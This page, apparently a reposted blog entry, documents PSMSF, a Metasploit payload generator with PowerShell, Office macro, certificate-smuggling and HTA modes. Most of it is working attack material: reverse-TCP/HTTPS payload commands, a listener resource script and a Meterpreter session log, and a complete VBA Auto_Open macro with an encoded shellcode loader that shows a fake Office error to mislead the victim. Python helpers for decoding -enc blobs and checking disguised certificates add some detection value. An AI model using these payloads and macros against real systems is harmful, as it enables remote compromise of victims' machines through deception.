Pentest - psmsf
Source: Internet  Editor: 程序博客网  Time: 2024/04/30 09:43
PSMSF
PSMSF generates payloads and helper files (batch scripts, Office macros, certificate-wrapped binaries, HTA pages) for use from a Windows cmd console or a browser together with Metasploit Framework. If you are familiar with the Windows cmd console, you can reuse the generated artefacts in other settings.
```
psmsf [master●] python psmsf.py -h
Usage: python psmsf.py [options]

Options:
  -h, --help            show this help message and exit
  --attacktype=ATTACKTYPE
                        Attack Types are supported. (ps, crt, hta, mac)

  Powershell/Macro Attack:
    Generate metasploit console script / macro

    --payload=PAYLOAD   payload of metasploit framework
    --lhost=LHOST       lhost for payload of metasploit framework
    --lport=LPORT       lport for payload of metasploit framework

  CERT Attack:
    Translate a binary file into a text certification file, and restore the
    cert file to a binary file on target machines

    --filename=FILENAME
                        file to be encoded to a certification

  HTA Attack:
    Generate HTA html page. When victims access HTA page, os will be attacked
    from Internet Explorer

    --command=COMMAND   command of attack mode
```
Requirement
If you use Kali Linux, install Metasploit Framework with:

```
$ sudo apt-get install metasploit-framework
```
Usage
psmsf supports four attack types, selected with `--attacktype` (ps, mac, crt, hta):
- [x] powershell attack
- [x] macro attack
- [x] cert attack
- [x] hta attack
Powershell Attack Mode
```
psmsf [master●] python psmsf.py --attacktype ps
[+] (ASCII-art banner)
[+] Everything is now generated in two files, ex:
    powershell_hacking.bat
      - shellcode can be executed in cmd console.
      - Usage: cmd.exe /c powershell_hacking.bat
    powershell_msf.rc
      - msfconsole resource script.
      - Usage: msfconsole -r powershell_msf.rc
[+] python psmsf.py --attacktype ps --payload windows/shell/reverse_tcp --lhost 192.168.1.100 --lport 8443
[+] python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.100 --lport 8443
[+] python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_http --lhost 192.168.1.100 --lport 8443
```
Running the mode with a payload, LHOST and LPORT generates the two files:

```
psmsf [master●] python psmsf.py --attacktype ps --payload windows/meterpreter/reverse_tcp --lhost 192.168.1.101 --lport 8443
[+] create msfconsole resource script
[+] create powershell shellcode command
```
Victim
Copy powershell_hacking.bat to the victim's machine and run it; the batch file launches the encoded PowerShell shellcode loader:

```
cmd.exe /c powershell_hacking.bat
```
Attacker
Start a Metasploit Framework listener from the generated resource script. Note that it sets ExitOnSession to false and runs the handler as a background job, so one listener can accept several callbacks:

```
psmsf [master●] msfconsole -r powershell_msf.rc
# cowsay++
 ____________
< metasploit >
 ------------
       \   ,__,
        \  (oo)____
           (__)    )\
              ||--|| *

       =[ metasploit v4.11.11-dev-95484c8                  ]
+ -- --=[ 1521 exploits - 884 auxiliary - 259 post        ]
+ -- --=[ 437 payloads - 38 encoders - 8 nops             ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

[*] Processing powershell_msf.rc for ERB directives.
resource (powershell_msf.rc)> use exploit/multi/handler
resource (powershell_msf.rc)> set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
resource (powershell_msf.rc)> set LHOST 192.168.1.101
LHOST => 192.168.1.101
resource (powershell_msf.rc)> set LPORT 8443
LPORT => 8443
resource (powershell_msf.rc)> set ExitOnSession false
ExitOnSession => false
resource (powershell_msf.rc)> set EnableStageEncoding true
EnableStageEncoding => true
resource (powershell_msf.rc)> exploit -j
[*] Exploit running as background job.
[*] Started reverse TCP handler on 192.168.1.101:8443
[*] Starting the payload handler...
msf exploit(handler) >
```
When powershell_hacking.bat runs on the victim's machine, the handler sends the (stage-encoded) Meterpreter stage and opens a new session:

```
msf exploit(handler) > jobs

Jobs
====

  Id  Name                    Payload                          LPORT
  --  ----                    -------                          -----
  0   Exploit: multi/handler  windows/meterpreter/reverse_tcp  8443

msf exploit(handler) >
[*] Encoded stage with x86/shikata_ga_nai
[*] Sending encoded stage (958029 bytes) to 192.168.1.101
[*] Meterpreter session 1 opened (192.168.1.101:8443 -> 192.168.1.101:64656) at 2016-02-20 17:46:01 +0800

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : SEC
OS              : Windows 7 (Build 7600).
```
Macro Attack Mode
Generate a VBA macro that executes the shellcode. The Auto_Open routine launches PowerShell with a base64-encoded (UTF-16LE) script; decoding that blob shows the standard unicorn-style loader: it declares VirtualAlloc and CreateThread (kernel32.dll) and memset (msvcrt.dll) through Add-Type, writes the shellcode bytes into memory allocated with PAGE_EXECUTE_READWRITE (0x40), starts a thread on it, sleeps forever, and on 64-bit Windows re-launches itself with the 32-bit PowerShell from syswow64 because the shellcode is x86. The macro then shows a fake "Critical Microsoft Office Error" dialog and quits the application so the document never appears to open:
```
root@lab:/usr/share/psmsf# python psmsf.py --attacktype mac --payload windows/meterpreter/reverse_https --lhost 192.168.1.101 --lport 8443
[+] create msfconsole resource script
[+] create powershell shellcode command
[+]
Sub Auto_Open()
Dim x
x = "powershell -window hidden -enc JAAxACAAPQAgACcAJABjACAAPQAgACcAJwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgASQBuAHQAUAB0AHIAIABsAHAAQQBkAGQAcgBlAHMAcwAsACAAdQBpAG4AdAAgAGQAdwBTAGkAegBlACwAIAB1AGkAbgB0ACAAZgBsAEEAbABsAG8AYwBhAHQAaQBvAG4AVAB5AHAAZQAsACAAdQBpAG4AdAAgAGYAbABQAHIAbwB0AGUAYwB0ACkAOwBbAEQAbABsAEkAbQBwAG8AcgB0ACgAIgBrAGUAcgBuAGUAbAAzADIALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgASQBuAHQAUAB0AHIAIABsAHAAVABoAHIAZQBhAGQAQQB0AHQAcgBpAGIAdQB0AGUAcwAsACAAdQBpAG4AdAAgAGQAdwBTAHQAYQBjAGsAUwBpAHoAZQAsACAASQBuAHQAUAB0AHIAIABsAHAAUwB0AGEAcgB0AEEAZABkAHIAZQBzAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFAAYQByAGEAbQBlAHQAZQByACwAIAB1AGkAbgB0ACAAZAB3AEMAcgBlAGEAdABpAG8AbgBGAGwAYQBnAHMALAAgAEkAbgB0AFAAdAByACAAbABwAFQAaAByAGUAYQBkAEkAZAApADsAWwBEAGwAbABJAG0AcABvAHIAdAAoACIAbQBzAHYAYwByAHQALgBkAGwAbAAiACkAXQBwAHUAYgBsAGkAYwAgAHMAdABhAHQAaQBjACAAZQB4AHQAZQByAG4AIABJAG4AdABQAHQAcgAgAG0AZQBtAHMAZQB0ACgASQBuAHQAUAB0AHIAIABkAGUAcwB0ACwAIAB1AGkAbgB0ACAAcwByAGMALAAgAHUAaQBuAHQAIABjAG8AdQBuAHQAKQA7ACcAJwA7ACQAdwAgAD0AIABBAGQAZAAtAFQAeQBwAGUAIAAtAG0AZQBtAGIAZQByAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAGMAIAAtAE4AYQBtAGUAIAAiAFcAaQBuADMAMgAiACAALQBuAGEAbQBlAHMAcABhAGMAZQAgAFcAaQBuADMAMgBGAHUAbgBjAHQAaQBvAG4AcwAgAC0AcABhAHMAcwB0AGgAcgB1ADsAWwBCAHkAdABlAFsAXQBdADsAWwBCAHkAdABlAFsAXQBdACQAegAgAD0AIAAwAHgAYgBhACwAMAB4ADEAYgAsADAAeAAxADEALAAwAHgAZgA0ACwAMAB4AGYANwAsADAAeABkADkALAAwAHgAYwAxACwAMAB4AGQAOQAsADAAeAA3ADQALAAwAHgAMgA0ACwAMAB4AGYANAAsADAAeAA1AGUALAAwAHgAMwAzACwAMAB4AGMAOQAsADAAeABiADEALAAwAHgANQA3ACwAMAB4ADMAMQAsADAAeAA1ADYALAAwAHgAMQAzACwAMAB4ADgAMwAsADAAeABlAGUALAAwAHgAZgBjACwAMAB4ADAAMwAsADAAeAA1ADYALAAwAHgAMQA0ACwAMAB4AGYAMwAsADAAeAAwADEALAAwAHgAMABiACwAMAB4AGMAMgAsADAAeAA3ADEALAAwAHgAZQA5ACwAMAB4AGYANAAsADAAeAAxADIALAAwAHgAMQA2ACwAMAB4ADYAMwAsADAAeAAxADEALAAwAHgAMgAzACwAMAB4ADEANgAsADAAeAAxADcALAAwAHgANQAxACwAMAB4ADEAMwAsADAAeABhADYALAAwAHgANQAzACwAMAB4ADMANwAsADAAeAA5AGYALAAwAHgANABkACwAMAB4ADMAMQAsADAAeABhAGMALAAwAHgAMQA0ACwAMAB4ADIAMwAsADAAeAA5AGUALAAwAHgAYwAzACwAMAB4ADkAZAAsADAAeAA4AGUALAAwAHgAZgA4ACwAMAB4AGUAYQAsADAAeAAxAGUALAAwAHgAYQAyACwAMAB4ADMAOQAsADAAeAA2AGMALAAwAHgAOQBjACwAMAB4AGIAOQAsADAAeAA2AGQALAAwAHgANABlACwAMAB4ADkAZAAsADAAeAA3ADEALAAwAHgANgAwACwAMAB4ADgAZgAsADAAeABkAGEALAAwAHgANgBjACwAMAB4ADgAOQAsADAAeABkAGQALAAwAHgAYgAzACwAMAB4AGYAYgAsADAAeAAzAGMALAAwAHgAZgAyACwAMAB4AGIAMAAsADAAeABiADYALAAwAHgAZgBjACwAMAB4ADcAOQAsADAAeAA4AGEALAAwAHgANQA3ACwAMAB4ADgANQAsADAAeAA5AGUALAAwAHgANQBhACwAMAB4ADUAOQAsADAAeABhADQALAAwAHgAMwAwACwAMAB4AGQAMQAsADAAeAAwADAALAAwAHgANgA2ACwAMAB4AGIAMgAsADAAeAAzADYALAAwAHgAMwA5ACwAMAB4ADIAZgAsADAAeABhAGMALAAwAHgANQBiACwAMAB4ADAANAAsADAAeABmADkALAAwAHgANAA3ACwAMAB4AGEAZgAsADAAeABmADIALAAwAHgAZgA4ACwAMAB4ADgAMQAsADAAeABmAGUALAAwAHgAZgBiACwAMAB4ADUANwAsADAAeABlAGMALAAwAHgAYwBmACwAMAB4ADAAOQAsADAAeABhADkALAAwAHgAMgA4ACwAMAB4AGYANwAsADAAeABmADEALAAwAHgAZABjACwAMAB4ADQAMAAsADAAeAAwADQALAAwAHgAOABmACwAMAB4AGUANgAsADAAeAA5ADYALAAwAHgANwA3ACwAMAB4ADQAYgAsADAAeAA2ADIALAAwAHgAMABkACwAMAB4AGQAZgAsADAAeAAxADgALAAwAHgAZAA0ACwAMAB4AGUAOQAsADAAeABkAGUALAAwAHgAYwBkACwAMAB4ADgAMwAsADAAeAA3AGEALAAwAHgAZQBjACwAMAB4AGIAYQAsADAAeABjADAALAAwAHgAMgA1ACwAMAB4AGYAMAAsADAAeAAzAGQALAAwAHgAMAA0ACwAMAB4ADUAZQAsADAAeAAwAGMALAAwAHgAYgA1ACwAMAB4AGEAYgAsADAAeABiADEALAAwAHgAOAA1ACwAMAB4ADgAZAAsADAAeAA4AGYALAAwAHgAMQA1ACwAMAB4AGMAZQAsADAAeAA1ADYALAAwAHgAYgAxACwAMAB4ADAAYwAsADAAeABhAGEALAAwAHgAMwA5ACwAMAB4AGMAZQAsADAAeAA0AGYALAAwAHgAMQA1ACwAMAB4AGUANQAsADAAeAA2AGEALAAwAHgAMQBiACwAMAB4AGIAYgAsADAAeABmADIALAAwAHgAMAA2ACwAMAB4ADQANgAsADAAeABkADMALAAwAHgANgBhACwAMAB4ADcAYwAsADAAeAAwAGQALAAwAHgAMgAzACwAMAB4ADEAYgAsADAAeAAwADkALAAwAHgAOAA0ACwAMAB4ADQAZAAsADAAeABiADIALAAwAHgAYQAxACwAMAB4ADMAZQAsADAAeABkAGQALAAwAHgAMwAzACwAMAB4ADYAYwAsADAAeABiADgALAAwAHgAMgAyACwAMAB4ADYAZQAsADAAeAA0ADEALAAwAHgAMQBkACwAMAB4ADgAZgAsADAAeABjADIALAAwAHgAZgAxACwAMAB4AGYAMgAsADAAeAA3AGMALAAwAHgAOABkACwAMAB4AGMAZgAsADAAeABhADIALAAwAHgAZgBiACwAMAB4AGUAYQAsADAAeABjAGYALAAwAHgAOQBlACwAMAB4AGEAOAAsADAAeABhADcALAAwAHgANAA1ACwAMAB4ADIAMgAsADAAeAAxAGQALAAwAHgAMQBiACwAMAB4AGYAMgAsADAAeABkAGYALAAwAHgAOAAxACwAMAB4ADkAYgAsADAAeAAwADIALAAwAHgAYwA4ACwAMAB4ADQAZAAsADAAeAA5AGIALAAwAHgAMAAyACwAMAB4ADAAOAAsADAAeAA2ADIALAAwAHgAYQBlACwAMAB4ADQAMAAsADAAeAAzAGIALAAwAHgAMQAzACwAMAB4ADgAOAAsADAAeAA0ADQALAAwAHgANgBiACwAMAB4ADgAMwAsADAAeAA0ADMALAAwAHgAYwBjACwAMAB4ADEANAAsADAAeAA5ADUALAAwAHgAOQAzACwAMAB4ADEAYgAsADAAeABhADMALAAwAHgAZABmACwAMAB4ADMAZgAsADAAeABjAGMALAAwAHgAYgA0ACwAMAB4AGUAZAAsADAAeAA1AGYALAAwAHgAOAA4ACwAMAB4AGUANgAsADAAeAA0ADIALAAwAHgAZgAzACwAMAB4AGMANgAsADAAeAA1AGIALAAwAHgAMwAyACwAMAB4ADkAYgAsADAAeAAwADMALAAwAHgAMABlACwAMAB4ADkANAAsADAAeAA2ADAALAAwAHgAMgBiACwAMAB4ADYANAAsADAAeAA3AGUALAAwAHgAZgBjACwAMAB4AGQAOQAsADAAeABkADgALAAwAHgAMQA2ACwAMAB4ADgAMQAsADAAeABlAGQALAAwAHgAZQA2ACwAMAB4AGUANgAsADAAeAAwADgALAAwAHgAZgAxACwAMAB4ADgAZAAsADAAeABlADIALAAwAHgANQBhACwAMAB4ADkAOAAsADAAeAA0AGUALAAwAHgAYgBjACwAMAB4ADMAMgAsADAAeAAyADkALAAwAHgAMwA3ACwAMAB4AGQAZQAsADAAeAA0ADUALAAwAHgAMgBlACwAMAB4ADYAMgAsADAAeAA4AGQALAAwAHgAMQBhACwAMAB4ADgAMgAsADAAeABkAGUALAAwAHgANgA3ACwAMAB4AGYANQAsADAAeAAwADkALAAwAHgAZQA3ACwAMAB4ADkAZgAsADAAeAA3AGUALAAwAHgAYQBkACwAMAB4ADMAMgAsADAAeAAxAGEALAAwAHgANAAwACwAMAB4ADIANAAsADAAeABiADcALAAwAHgANgBiACwAMAB4ADMANAAsADAAeAAxAGUALAAwAHgAYQBmACwAMAB4ADgAMwAsADAAeAAwADMALAAwAHgAMAAyACwAMAB4ADYANgAsADAAeAA5AGMALAAwAHgAYgA5ACwAMAB4ADIAOQAsADAAeABjADcALAAwAHgAMABhACwAMAB4ADQAMgAsADAAeABiAGUALAAwAHgAYwA3ACwAMAB4AGMAYQAsADAAeAAyAGEALAAwAHgAYgBlACwAMAB4AGMANwAsADAAeAA4AGEALAAwAHgAYQBhACwAMAB4AGUAZAAsADAAeABhAGYALAAwAHgANQAyACwAMAB4ADAAZgAsADAAeAA0ADIALAAwAHgAZAA1ACwAMAB4ADkAZAAsADAAeAA5AGEALAAwAHgAZgA2ACwAMAB4ADQANgAsADAAeAAzADIALAAwAHgAYQBjACwAMAB4ADEAZQAsADAAeAAzAGYALAAwAHgAZABjACwAMAB4AGEAZQAsADAAeABjADAALAAwAHgAYwAwACwAMAB4ADEAYwAsADAAeABmAGMALAAwAHgANQA2ACwAMAB4AGEAOQAsADAAeAAwAGUALAAwAHgAOQA0ACwAMAB4AGQAZQAsADAAeABjAGIALAAwAHgAZAAxACwAMAB4ADQAZAAsADAAeAA2ADUALAAwAHgAYwBiACwAMAB4ADUAOQAsADAAeABhADMALAAwAHgAZQBkACwAMAB4AGMAYgAsADAAeABhADAALAAwAHgAZgA4ACwAMAB4ADcANwAsADAAeAAxADMALAAwAHgAZAA3ACwAMAB4ADEAYgAsADAAeAAyAGYALAAwAHgANQA3ACwAMAB4ADQAOAAsADAAeAAwAGMALAAwAHgAYQA1ACwAMAB4AGEAOAAsADAAeAA4ADkALAAwAHgAMwAzACwAMAB4ADcANwAsADAAeAA2AGUALAAwAHgANAA3ACwAMAB4AGUAMgAsADAAeAA0ADkALAAwAHgAYQA2ACwAMAB4ADkAZgAsADAAeABkADQALAAwAHgAOQA4ACwAMAB4AGUAOAAsADAAeABlAGUALAAwAHgAMQA4ACwAMAB4AGUAYQAsADAAeABmADQAOwAkAGcAIAA9ACAAMAB4ADEAMAAwADAAOwBpAGYAIAAoACQAegAuAEwAZQBuAGcAdABoACAALQBnAHQAIAAwAHgAMQAwADAAMAApAHsAJABnACAAPQAgACQAegAuAEwAZQBuAGcAdABoAH0AOwAkAHgAPQAkAHcAOgA6AFYAaQByAHQAdQBhAGwAQQBsAGwAbwBjACgAMAAsADAAeAAxADAAMAAwACwAJABnACwAMAB4ADQAMAApADsAZgBvAHIAIAAoACQAaQA9ADAAOwAkAGkAIAAtAGwAZQAgACgAJAB6AC4ATABlAG4AZwB0AGgALQAxACkAOwAkAGkAKwArACkAIAB7ACQAdwA6ADoAbQBlAG0AcwBlAHQAKABbAEkAbgB0AFAAdAByAF0AKAAkAHgALgBUAG8ASQBuAHQAMwAyACgAKQArACQAaQApACwAIAAkAHoAWwAkAGkAXQAsACAAMQApAH0AOwAkAHcAOgA6AEMAcgBlAGEAdABlAFQAaAByAGUAYQBkACgAMAAsADAALAAkAHgALAAwACwAMAAsADAAKQA7AGYAbwByACAAKAA7ADsAKQB7AFMAdABhAHIAdAAtAHMAbABlAGUAcAAgADYAMAB9ADsAJwA7ACQAZQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AQwBvAG4AdgBlAHIAdABdADoAOgBUAG8AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAG4AaQBjAG8AZABlAC4ARwBlAHQAQgB5AHQAZQBzACgAJAAxACkAKQA7ACQAMgAgAD0AIAAiAC0AZQBuAGMAIAAiADsAaQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA4ACkAewAkADMAIAA9ACAAJABlAG4AdgA6AFMAeQBzAHQAZQBtAFIAbwBvAHQAIAArACAAIgBcAHMAeQBzAHcAbwB3ADYANABcAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABcAHYAMQAuADAAXABwAG8AdwBlAHIAcwBoAGUAbABsACIAOwBpAGUAeAAgACIAJgAgACQAMwAgACQAMgAgACQAZQAiAH0AZQBsAHMAZQB7ADsAaQBlAHgAIAAiACYAIABwAG8AdwBlAHIAcwBoAGUAbABsACAAJAAyACAAJABlACIAOwB9AA=="
Shell ("POWERSHELL.EXE " & x)
Dim title As String
title = "Critical Microsoft Office Error"
Dim msg As String
Dim intResponse As Integer
msg = "This document appears to be corrupt or missing critical rows in order to restore. Please restore this file from a backup."
intResponse = MsgBox(msg, 16, title)
Application.Quit
End Sub
```
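Both the batch file from the Powershell attack mode and the macro above hand PowerShell a `-enc <blob>` argument, where the blob is the script text encoded as UTF-16LE and then base64. The following is an added example, not psmsf's or unicorn's code, for producing such a blob and, more usefully on the defence side, unpacking every `-enc` argument out of a captured command line (for example from Sysmon process-creation events). The regex, the indicator list and the sample loader script are constructed for the example; the sample mirrors the shape of the decoded blob on this page but only declares VirtualAlloc and never allocates, copies or runs anything.

```python
import base64
import binascii
import re

# powershell.exe accepts any unambiguous prefix of -EncodedCommand (-e, -ec,
# -en, -enc, ...). The pattern deliberately fails on -ExecutionPolicy / -ep,
# whose argument would otherwise be taken for a blob.
ENC_RE = re.compile(r"-e(?:c|n[a-z]*)?\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)

# Strings the unicorn-style loader emitted by psmsf depends on; any one of them
# inside a decoded command line is worth an alert (constructed list).
INDICATORS = ("Add-Type", "DllImport", "VirtualAlloc", "CreateThread",
              "memset", "syswow64", "-enc")

# Constructed stand-in for the loader inside the page's blob: same shape (inline
# C# via Add-Type, then a nested launch of 32-bit PowerShell), but harmless.
SAMPLE_LOADER = (
    "$1 = '$c = ''[DllImport(\"kernel32.dll\")]public static extern IntPtr "
    "VirtualAlloc(IntPtr a, uint s, uint t, uint p);'';"
    "$w = Add-Type -memberDefinition $c -Name \"Win32\" -namespace Win32Functions -passthru;';"
    "$e = [System.Convert]::ToBase64String([System.Text.Encoding]::Unicode.GetBytes($1));"
    "if([IntPtr]::Size -eq 8){iex \"& $env:SystemRoot\\syswow64\\WindowsPowerShell\\v1.0\\powershell -enc $e\"}"
    "else{iex \"& powershell -enc $e\"}"
)


def encode_command(script: str) -> str:
    """UTF-16LE then base64: the encoding -EncodedCommand expects and psmsf emits."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


def decode_command(blob: str) -> str:
    """Inverse of encode_command. Raises ValueError when the blob is not base64
    or not UTF-16LE (UnicodeDecodeError is a ValueError subclass)."""
    try:
        raw = base64.b64decode(blob, validate=True)
    except binascii.Error as exc:
        raise ValueError("not base64") from exc
    if len(raw) % 2:
        raise ValueError("odd byte count, not UTF-16LE")
    return raw.decode("utf-16-le")


def extract_encoded_commands(cmdline: str, max_depth: int = 4) -> list:
    """Decode every -enc blob in a command line, outermost first.

    Each decoded script is scanned again, because loaders nest a second
    'powershell -enc ...' inside the first (unicorn does so to relaunch the
    32-bit PowerShell on 64-bit hosts). Depth is capped so hostile input
    cannot make this loop.
    """
    found = []
    if max_depth <= 0:
        return found
    for m in ENC_RE.finditer(cmdline):
        try:
            script = decode_command(m.group(1))
        except ValueError:
            continue  # a switch that merely starts with -e, or a truncated blob
        found.append(script)
        found.extend(extract_encoded_commands(script, max_depth - 1))
    return found


def indicators(script: str) -> set:
    """Which of the loader's tell-tale strings a decoded script contains."""
    return {k for k in INDICATORS if k in script}
```

The page's own blob embeds the inner script as a plain `$1 = '...'` string and only encodes it at run time, so a single decode already exposes VirtualAlloc, CreateThread and the shellcode bytes; the recursion matters for samples whose inner stage is already base64 on disk.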
Cert Attack Mode
This mode translates a binary file into a certificate file: a plain-text, base64 envelope that can be moved as text and restored to the original binary on the target.
```
psmsf [master●] python psmsf.py --attacktype crt --filename demo.exe
psmsf [master●] ll cert_attack
total 48
-rw-r--r--  1 Open-Security  staff    44B Feb 20 21:31 cert_decode.bat
-rw-r--r--  1 Open-Security  staff    17K Feb 20 21:31 cert_encode.crt
```
Upload cert_encode.crt to the victim machine and restore the original binary with the Windows batch script cert_decode.bat.
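As an added example (not psmsf's code; the page does not show cert_decode.bat, and it is an assumption here that it wraps `certutil -decode`, which a 44-byte batch file is consistent with), the following Python reproduces the envelope that `certutil -encode` writes and `certutil -decode` reads back, and adds the check a defender would run on a .crt that turns up where no certificate belongs. The sample binary and the sample DER blob are constructed, not real files.

```python
import base64
import binascii

HEADER = "-----BEGIN CERTIFICATE-----"
FOOTER = "-----END CERTIFICATE-----"

# Constructed stand-in for demo.exe: starts with the "MZ" DOS-header magic of a
# Windows executable but is not one; it exists only to be round-tripped.
SAMPLE_BINARY = b"MZ\x90\x00\x03\x00\x00\x00" + bytes(range(256)) * 4

# Constructed stand-in for a genuine certificate: DER always begins with an
# ASN.1 SEQUENCE tag (0x30) and a length; the rest is filler.
SAMPLE_DER = b"\x30\x82\x01\x00" + b"\x00" * 256


def encode_as_cert(data: bytes) -> str:
    """Wrap arbitrary bytes in a PEM-style certificate envelope: base64 body in
    64-character lines with CRLF endings, the layout `certutil -encode` writes
    and `certutil -decode` accepts."""
    b64 = base64.b64encode(data).decode("ascii")
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return "\r\n".join([HEADER, *lines, FOOTER]) + "\r\n"


def decode_cert(text: str) -> bytes:
    """Restore the bytes from the envelope. Tolerates LF or CRLF, blank lines
    and a missing header/footer; rejects anything that is not base64."""
    body = "".join(
        line.strip() for line in text.splitlines()
        if line.strip() and not line.strip().startswith("-----")
    )
    try:
        return base64.b64decode(body, validate=True)
    except binascii.Error as exc:
        raise ValueError("envelope body is not base64") from exc


def classify_cert_file(text: str) -> str:
    """Defender-side check: 'der' if the payload starts with the SEQUENCE tag
    real X.509 has, 'pe' if it starts with the MZ magic of a Windows
    executable (a smuggled binary), otherwise 'other'."""
    try:
        payload = decode_cert(text)
    except ValueError:
        return "other"
    if payload.startswith(b"MZ"):
        return "pe"
    if payload[:1] == b"\x30":
        return "der"
    return "other"


if __name__ == "__main__":
    envelope = encode_as_cert(SAMPLE_BINARY)
    assert decode_cert(envelope) == SAMPLE_BINARY
    print(envelope.splitlines()[0], "->", classify_cert_file(envelope))
```

On Windows the equivalent commands are `certutil -encode demo.exe cert_encode.crt` and `certutil -decode cert_encode.crt demo.exe`. Because the envelope is plain base64, the binary is only as hidden as its header, and `certutil -decode` run against a non-certificate file is a widely monitored living-off-the-land pattern, so expect endpoint detection to flag the restore step.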
HTA Attack Mode
This mode generates a Windows HTA page. The generator writes index.html, the landing page the victim is sent to (for example http://demo.com/index.html), and module.hta, the HTA application that carries the command given with `--command`; the command runs when the page is opened in Internet Explorer.
```
psmsf [master●] python psmsf.py --attacktype hta --command whoami
[+] create hta index file
[+] create hta module file
psmsf [master●] ll windows_hta_attack
total 16
-rw-r--r--  1 Open-Security  staff   151B Feb 20 21:37 index.html
-rw-r--r--  1 Open-Security  staff   122B Feb 20 21:37 module.hta
```
References
https://github.com/trustedsec/unicorn
License: BSD License